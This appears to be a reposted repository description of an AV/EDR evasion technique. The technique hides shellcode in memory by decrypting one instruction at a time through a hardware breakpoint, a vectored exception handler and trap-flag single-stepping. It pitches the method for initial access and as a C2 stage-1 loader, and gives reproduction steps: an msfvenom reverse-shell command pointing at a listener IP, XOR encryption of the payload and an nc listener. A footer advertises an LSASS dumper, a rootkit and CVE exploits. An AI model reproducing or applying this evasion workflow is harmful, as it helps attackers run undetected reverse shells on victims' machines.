A technique that can be used to bypass AV/EDR memory scanners
.
This can be used to hide well-known and detected shellcodes (such as msfvenom) by performing on-the-fly decryption of individual encrypted assembly instructions
, thus rendering memory scanners useless for that specific memory page.
This technique will create a PAGE_EXECUTE_READWRITE
memory region where the encrypted assembly instructions will be stored.
The shellcode will be wrapped around some padding. The program will set a Hardware Breakpoint
(HWBP) on the entrypoint of the shellcode.
Next, the program will install a Vectored Exception Handler
(VEH).
This VEH will basically act like a debugger
, single stepping through the code, reading the instruction pointer register (RIP) for each SINGLE STEP
exception received by the VEH, and decrypting the next 16 bytes (maximum x64 assembly instruction length) where RIP points .
The VEH also encrypts back the previously decrypted instruction, ensuring that the rest of the shellcode stays always encrypted with the exception of the single assembly instruction currently executed.
After that, it will continue execution, with the TRAP FLAG
configured on the Eflags register.
This will ensure that the next assembly instruction will also trigger a breakpoint exception that the VEH can handle.
After the VEH installation, the main thread
execution will be redirected to the payload entrypoint
.
When the HWBP will be triggered at the entrypoint, the VEH will stop at each assembly instruction executed, perform the decryption of the next assembly instruction and encrypt the previous encrypted instruction which is saved as a global variable.
By doing this, basically one single assembly instruciton is decrypted at a time
, with the rest of the payload staying encrypted
.
NOTE:
This technique is ideal to obtain an initial access using a basic shellcode such as msfvenom or custom revers shells.
This can also be used as an initial stage 1 payload that downloads the rest of the payload from the C2 server.
NOTE:
This technique is not compatible with all payloads (such as reflective loaders) . Below is a list of current limitations:
VEH
will trigger for EACH ASSEMBLY INSTRUCTION
executed in the shellcode, the execution speed of the shellcode will be drastically slowed down. NtCreateThread
or any of its wrappers in Kernelbase.dll with the entrypoint inside the shellcode
, the payload will not work
since the VEH will not trigger for that thread execution since there is no HWBP installed at the entrypoint of the newly created thread
. (Work in progress – will be implemented further in this repo)values/variables stored inside itself
(for example, having the raw string “powershell.exe” that is referenced via an offset in a call to WinExec WINAPI) or some number saved at an offset
, and the shellcode will later try to load or reference it somewhere, the program will not work since the specific variable or string will be encrypted
and the VEH does not decrypt it. push 0x4141414141414141
to push “AAAAAAAA” on the stack to be used in a call to a function), this technique will work. (Work in progress – will be implemented further in this repo)How to reproduce the POC:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.100.33 LPORT=443 -f raw > shell.asm
2.) Use the XorEncryptPayload.exe to XOR encrypt the payload
./XorEncryptPayload.exe C:\Path\to\shell.asm
nc -nvlp 443
Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…
Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…